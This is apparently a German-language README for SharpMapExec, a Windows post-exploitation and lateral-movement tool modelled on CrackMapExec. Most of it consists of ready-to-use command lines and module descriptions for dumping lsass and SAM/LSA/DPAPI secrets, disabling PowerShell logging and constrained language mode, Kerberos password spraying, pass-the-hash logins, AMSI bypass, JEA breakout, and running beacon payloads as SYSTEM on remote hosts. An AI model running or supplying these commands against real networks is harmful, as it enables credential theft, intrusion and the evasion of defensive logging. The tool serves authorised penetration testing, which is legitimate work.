
Windows-natives Penetrationstest-Schweizer Taschenmesser für laterale Bewegung, Zugriff auf Anmeldeinformationen, Datenerxilration und Schwachstellenscans über CIM, SMB, WinRM, LDAP und Domain-Protokolle mit Kerberos/NTLM-Authentifizierung.
Eine geschärfte Version von CrackMapExec. Dieses Tool wurde entwickelt, um Penetrationstests von Netzwerken zu vereinfachen und ein Schweizer Taschenmesser zu schaffen, das unter Windows läuft – was bei Simulationen von Insider-Bedrohungen oft erforderlich ist.
Neben der Zugriffssuche kann es verwendet werden, um anfällige Konfigurationen zu identifizieren und Daten zu exfiltrieren. Die Idee hinter den Data-Exfiltration-Modulen besteht darin, die geringste Menge an notwendigem Code auf dem entfernten Computer auszuführen. Dazu lädt das Tool alle Geheimnisse in das Loot-Verzeichnis herunter und analysiert sie lokal.
Sie können festlegen, ob Sie Kerberos- oder NTLM-Authentifizierung verwenden möchten. Wenn Sie Kerberos wählen, erstellt das Tool einen Opfer-Token und verwendet Rubeus, um das Ticket zu importieren/anzufordern. Bei NTLM verwendet das Tool SharpKatz SetThreadToken oder LogonUser-Impersonifizierung.
SharpMapExec.exe
usage:
--- Cim ---
Need plaintext password or the /impersonate flag
SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET
Available Cim modules
/m:enable_winrm (Runs Enable-PSRemoting -Force)
/m:disable_winrm (Runs Disable-PSRemoting -Force)
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:disable_pslogging (Modify registry to disable PowerShell Logging)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Reg32 ---
SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Reg32 modules
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Smb modules
/m:shares (Scan for accessible Smb shares)
--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump & parse lsass)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
/m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
/m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
/m:download /path:C:\file /destination:file (Download file from host)
/m:upload /path:C:\file /destination:file (Upload file to host)
--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg
--- Ldap ---
SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
Ldap modules
/m:spraydata (Download user and password policy)
Kann verwendet werden, um Administratorzugriff, zugängliche SMB-Freigaben, SMB-Version und Relay-Signing zu scannen.
/m:shares (Scan enumerated shares for access)
Das Biest. Es verfügt über integrierten Amsi-Bypass, JEA-Language-Breakout, JEA-Funktionsanalyse. Kann für Codeausführung zum Scannen nach PsRemote-Zugriff, anfälligen JEA-Endpunkten und Data-Exfiltration verwendet werden.
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)
Unterstützt derzeit Domain-Password-Spraying und das Erstellen eines TGT für den aktuellen Benutzer, das mit dem Parameter /ticket verwendet werden kann, um den aktuellen Kontext zu erhalten.
Laden Sie die erforderlichen Daten vor dem Password-Spraying herunter.
/m:spraydata (Download user and password policy)
Für einfache oder Massen-In-Memory-Ausführung von C#-Assemblies

Kerberos-Password-Spraying, dann Scannen nach lokalem Administratorzugriff

Dieses Projekt unterstützt das Scannen von JEA-Endpunkten und analysiert den Quellcode von nicht standardmäßigen Befehlen und prüft, ob der Endpunkt nicht für den no-language-Modus konfiguriert wurde.

Entdecken Sie die Wiederverwendung lokaler Administrator-Passwörter mit einem NT-Hash.

Massen-Dump des Lsass-Prozesses mit integrierter, von Microsoft signierter DLL und speichert ihn im loot-Ordner

Wird in allen eindeutig nach Benutzern sortierten Delegationsprozessen ausgeführt

Scannen nach SMB-Signing und SMBv1

Und viel mehr!
Einige Szenarien mit Kerberos erfordern, dass Sie Ihre Uhr mit dem DC synchronisieren und den DNS einstellen.
net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')
Projekte, die geholfen haben oder in diesem Tool vorhanden sind